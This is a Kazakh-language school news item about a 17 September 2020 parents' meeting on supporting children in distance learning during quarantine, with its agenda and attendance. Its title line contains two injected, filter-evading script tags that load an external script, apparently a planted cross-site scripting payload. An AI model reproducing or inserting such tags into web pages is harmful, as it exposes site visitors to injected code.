Ата-аналар жиналысы туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
21.09.2020
2020 жылдың 17 қыркүйек күні ата-аналар жиналысы қашықта оқитын 5 мектепте /Астрахан №1 ОМ, Астрахан №2 ОМ, Жалтыр №1, Жалтыр №4, Первомайская ОМ/ өтті. Жалпыреспубликалық ата-аналар жиналысының тақырыбы «Қашықтан оқыту кезінде балаға қалай көмектесуге болады?» .
Ата-аналар жиналысының мақсаты: коронавирустық инфекцияның таралуына жол бермеуге байланысты карантиндік шаралар жағдайында жаңа 2020-2021 оқу жылындағы оқытудың ерекшеліктері туралы ата-аналарды (балалардың заңды өкілдерін) хабардар ету.
Ата-аналар жиналысының күн тәртібіндегі сұрақтар:
- Жаңа оқу жылындағы оқу форматтары.
- Қашықтан оқыту: баланың іс-әрекеті және жұмыс орны.
- Қашықтан оқыту процесі жүргізілетін білім беру Интернет-платформасымен танысу.
- Жаңа оқу жылында білім алушыларды бағалау жүйесі.
- Баланың оқу режимі және демалысы.
- Баланы өздігінен оқуға қалай ынталандыруға болады?
- Интернетті қауіпсіз пайдалану үшін ата-аналарға балаларына үйрететін ережелер.
- Интернеттегі балалардың жұмысын ата-ана бақылауы ережелерімен таныстыру
- Ата-ана мен баланың қарым-қатынас психологиясы.
Ата-аналар жиналысына 597 ата-ана қатысты.


Просмотров: 679